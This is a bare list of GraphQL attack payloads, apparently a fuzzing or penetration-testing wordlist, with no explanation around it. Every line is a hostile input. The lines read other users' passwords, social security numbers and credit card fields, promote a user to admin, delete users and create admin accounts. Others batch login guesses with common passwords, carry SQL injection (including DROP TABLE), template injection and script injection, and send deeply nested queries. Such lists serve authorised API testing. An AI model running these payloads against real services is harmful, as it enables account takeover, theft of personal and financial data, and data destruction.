query{user(id:1){id,username,email,password}}
query{user(id:2){id,username,email,password}}
query{users{id,username,email,role,password}}
query{users{id,username,email,ssn,creditCard}}
mutation{updateUser(id:1,role:"admin"){id,role}}
mutation{deleteUser(id:1){id}}
mutation{createUser(username:"admin2",password:"password",role:"admin"){id}}
query{a1:user(id:1){email}a2:user(id:2){email}a3:user(id:3){email}a4:user(id:4){email}a5:user(id:5){email}a6:user(id:6){email}a7:user(id:7){email}a8:user(id:8){email}a9:user(id:9){email}a10:user(id:10){email}}
query{a1:login(username:"admin",password:"password"){token}a2:login(username:"admin",password:"admin"){token}a3:login(username:"admin",password:"123456"){token}a4:login(username:"admin",password:"password123"){token}}
query{search(query:"test"){...on User{id,email}...on Post{id,title}...on Comment{id,body}}}
query {__typename @skip(if: false)}
query{user(id:"1 OR 1=1"){id,username}}
query{user(id:"1' OR '1'='1"){id,username}}
query{user(id:"1; DROP TABLE users--"){id,username}}
query{search(query:"{{7*7}}"){id}}
query{search(query:"<script>alert(1)</script>"){id}}
[{"query":"query{user(id:1){id}}"},{"query":"query{user(id:2){id}}"},{"query":"query{user(id:3){id}}"}]
query q{a(func:{nested:{nested:{nested:{nested:{nested:{nested:{nested:{nested:{nested:{nested:true}}}}}}}}}){id}}
